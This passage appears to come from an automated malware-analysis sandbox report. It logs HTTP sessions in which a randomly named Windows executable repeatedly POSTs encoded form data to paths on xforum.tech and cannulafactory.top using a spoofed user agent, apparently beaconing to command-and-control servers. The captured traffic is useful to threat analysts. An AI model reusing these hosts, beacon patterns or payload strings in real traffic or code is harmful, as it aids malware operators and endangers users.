                  Data Raw: 35 36 67 44 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 38 67 68 35 75 6b 50 30 6c 55 43 6e 62 75 6b 77 39 69 2f 59 36 74 67 57 2b 57 39 42 49 34 68 47 36 31 6b 51 6f 71 74 55 4d 61 47 64 49 36 76 54 44 79 4e 65 37 65 62 4a 2b 41 4e 6d 2f 63 6f 56 53 6a 4a 74 79 67 4d 57 69 78 44 56 79 64 7a 32 6a 30 38 59 56 77 55 47 74 4f 4b 36 53 63 73 7a 5a 45 39 64 62 33 6d 68 2b 6b 73 77 66 56 6e 46 45 6b 2b 7a 64 41 6b 63 38 73 4c 2f 47 39 57 58 4e 74 64 36 36 4f 6e 79 67 4f 43 58 73 50 68 41 6e 65 64 74 6c 61 4b 50 6f 66 38 4a 34 42 58 74 61 72 73 2f 72 6a 39 51 50 4f 30 6e 74 64 38 6d 66 6a 30 66 4c 51 3d 3d
                  Data Ascii: 56gD=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlaKPof8J4BXtars/rj9QPO0ntd8mfj0fLQ==
                  Sep 4, 2024 09:37:10.520262957 CEST872INHTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:10 GMT
                  server: Apache
                  set-cookie: __tad=1725435430.3329141; expires=Sat, 02-Sep-2034 07:37:10 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-encoding: gzip
                  content-length: 577
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                  Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.449759103.224.182.242805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:12.467273951 CEST762OUTPOST /647x/ HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.xforum.tech
                  Referer: http://www.xforum.tech/647x/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 56 47 36 58 38 51 76 62 74 55 4e 61 47 64 47 61 76 4b 48 79 4e 72 37 65 65 38 2b 46 4e 6d 2f 63 38 56 53 69 56 74 79 58 77 56 6a 68 44 62 72 4e 7a 30 6e 30 38 59 56 77 55 47 74 4b 69 45 53 66 63 7a 5a 30 74 64 63 6d 6d 69 68 55 73 33 57 31 6e 46 41 6b 2b 33 64 41 6b 75 38 74 6e 52 47 2f 75 58 4e 73 4e 36 36 66 6e 78 71 4f 43 56 7a 66 67 71 67 62 73 49 74 61 58 30 68 4f 73 49 36 67 6a 76 62 74 39 6c 36 53 63 48 64 4f 51 55 77 61 31 53 53 67 4a 57 51 63 70 32 48 34 59 46 4b 32 4f 71 71 76 30 46 4b 6f 31 69 7a 44 59 3d
                  Data Ascii: 56gD=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOQUwa1SSgJWQcp2H4YFK2Oqqv0FKo1izDY=
                  Sep 4, 2024 09:37:13.213840008 CEST872INHTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:12 GMT
                  server: Apache
                  set-cookie: __tad=1725435432.1598786; expires=Sat, 02-Sep-2034 07:37:12 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-encoding: gzip
                  content-length: 577
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                  Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.449760103.224.182.242805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:15.011987925 CEST10844OUTPOST /647x/ HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.xforum.tech
                  Referer: http://www.xforum.tech/647x/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 74 47 36 6b 30 51 73 38 5a 55 4b 61 47 64 4f 36 76 50 48 79 4e 4d 37 61 79 34 2b 46 78 70 2f 66 45 56 54 41 64 74 30 6d 77 56 73 68 44 62 6b 74 7a 33 6a 30 38 52 56 77 45 43 74 4f 47 45 53 66 63 7a 5a 32 46 64 4b 6e 6d 69 79 45 73 77 66 56 6e 5a 45 6b 2b 66 64 45 41 2b 38 74 54 76 47 4d 6d 58 44 73 39 36 35 70 62 78 69 4f 43 54 77 66 67 79 67 62 6f 62 74 61 36 50 68 4f 5a 74 36 67 58 76 62 59 77 71 6e 78 59 46 4f 38 4a 4a 6c 64 52 5a 56 7a 56 6a 51 72 6c 63 45 59 6b 6a 58 56 75 4f 71 50 77 56 65 49 78 6f 6c 7a 6d 31 5a 34 70 49 43 6f 79 30 65 49 6f 57 68 34 62 42 77 52 31 65 53 71 59 35 70 49 53 4b 32 4d 48 52 48 4d 65 79 56 6a 67 44 4b 77 61 6c 4c 72 7a 58 6c 59 56 49 51 2f 68 6a 45 6e 6d 54 6f 56 45 79 73 72 64 79 6a 31 37 49 73 2f 64 69 6a 30 71 75 6e 42 30 6f 69 42 4d 42 51 51 44 68 50 39 73 68 57 4b 72 4a 61 6e 33 6e 58 30 49 39 32 62 45 53 65 6a 59 64 59 [TRUNCATED]
                  Data Ascii: 56gD=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKtG6k0Qs8ZUKaGdO6vPHyNM7ay4+Fxp/fEVTAdt0mwVshDbktz3j08RVwECtOGESfczZ2FdKnmiyEswfVnZEk+fdEA+8tTvGMmXDs965pbxiOCTwfgygbobta6PhOZt6gXvbYwqnxYFO8JJldRZVzVjQrlcEYkjXVuOqPwVeIxolzm1Z4pICoy0eIoWh4bBwR1eSqY5pISK2MHRHMeyVjgDKwalLrzXlYVIQ/hjEnmToVEysrdyj17Is/dij0qunB0oiBMBQQDhP9shWKrJan3nX0I92bESejYdYucQ4t+s3OmFkVYXAEjs/nxJtj1p7ptZ0Wzpr5lLnxH+p+rZG6XEtTboffvSr86jXaCwvYQcmnDbP0LyP/RxR93LuJ9V8eitX37k7XXp245qu1X+IZvQ5gm24SNsbSKJ8TwZrq0PW4A93BjO4Y/ezn4eIHdgyAZijHUzK5tNMSm9G3OTs4CAyK2E8vz0933E5HJVr1al54pe2aQHJfqPT4l8Lib3x7h/N6Q3HHNhrmcH8RV+fY7MHqscnPvgl9jKLycTZBvC0ntgoo/OIDJaJKhviWuZBW10cA/vLthZ0GjpsfXfc6Yzr9I9dGcKsju2yMCOmFcS/tIZvdkxo7OiZ1130spMtmdjGQNmYdi/sh7HdIa/V4bR1cMDRa6C8J+pWo2S5LsC/tlgSOfbdFvceGnphd05XlHkjoaIksFzFP7e8Ui9fMoHcbYrunu/hwLEPcP0cRXCb16E4mJnmKM6ERyTfvX19MyKoD+8oUdKRFzlE4OPMHVIS5gpyBh6KvAnzotNGLB3kdxasu4XZcjwQ/QVRboTcGbfxUdFAaf+etGALg9FwxJGUqSTTiP5dFX1CiWd4ODV4EWQ4q0eri84WVr996UjGgbohekmofAVfMwbzUvTZpDDgf7AenwKbqBqLZJng4THAoIKx0ch3FaTQefwugJOKh2nJEt [TRUNCATED]
                  Sep 4, 2024 09:37:15.711798906 CEST872INHTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:15 GMT
                  server: Apache
                  set-cookie: __tad=1725435435.2574839; expires=Sat, 02-Sep-2034 07:37:15 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-encoding: gzip
                  content-length: 577
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                  Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.449761103.224.182.242805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:17.554378986 CEST480OUTGET /647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:18.200239897 CEST1236INHTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:18 GMT
                  server: Apache
                  set-cookie: __tad=1725435438.2178816; expires=Sat, 02-Sep-2034 07:37:18 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-length: 1473
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 35 36 67 44 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 69 77 6d 50 36 6c 45 75 61 59 72 4e 79 39 78 66 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 68 30 50 59 70 4f 47 75 73 52 67 42 54 43 74 69 30 2b 47 71 52 66 39 4e 59 45 4a 33 4d 33 6e 49 67 33 73 3d 26 67 54 53 70 63 3d 4b 68 62 38 70 54 26 27 [TRUNCATED]
                  Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text
                  Sep 4, 2024 09:37:18.200257063 CEST509INData Raw: 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 35 36 67 44
                  Data Ascii: ="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT&fp=-3'>Click here to enter


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.44976218.183.3.45805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:24.025834084 CEST763OUTPOST /l90v/ HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.cannulafactory.top
                  Referer: http://www.cannulafactory.top/l90v/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 55 63 67 44 35 52 6d 37 6d 4b 2b 30 64 56 34 66 58 65 39 6c 47 33 65 43 77 35 48 45 76 6a 6c 53 51 3d 3d
                  Data Ascii: 56gD=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavUcgD5Rm7mK+0dV4fXe9lG3eCw5HEvjlSQ==
                  Sep 4, 2024 09:37:24.906677008 CEST1236INHTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:24 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:24.906693935 CEST224INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                  Sep 4, 2024 09:37:24.906702995 CEST1236INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                  Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                  Sep 4, 2024 09:37:24.906717062 CEST1236INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65
                  Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with
                  Sep 4, 2024 09:37:24.906727076 CEST212INData Raw: 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 70 6f 77 65 72 65 64 62 79 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 5b 20 50 6f 77 65 72 65 64 20 62 79 20 52 65
                  Data Ascii: g src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div> </div> </body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.44976318.183.3.45805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:26.579575062 CEST783OUTPOST /l90v/ HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.cannulafactory.top
                  Referer: http://www.cannulafactory.top/l90v/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 57 6c 45 6f 64 4c 71 4c 61 33 57 5a 37 34 69 50 55 65 42 55 70 4b 73 6a 56 6f 43 58 5a 63 6b 50 6f 4e 6b 4c 41 6a 33 75 4a 62 5a 4f 42 6d 63 79 66 69 52 66 4a 69 58 2f 32 7a 57 6d 75 64 63 61 4f 70 77 41 58 4a 53 55 74 73 77 30 41 57 6d 52 6a 77 70 66 59 64 46 30 54 6a 4a 6b 30 72 4e 7a 2b 6f 7a 39 61 61 76 45 52 63 38 73 38 67 42 70 49 6d 6c 6d 6b 43 53 32 6c 73 78 4b 34 45 43 6b 30 65 34 78 62 45 69 4f 6d 2f 71 33 47 54 74 66 33 77 7a 4a 73 65 73 4a 52 42 47 6c 37 35 76 4b 45 51 73 61 52 63 53 67 2f 32 6e 43 69 41 3d
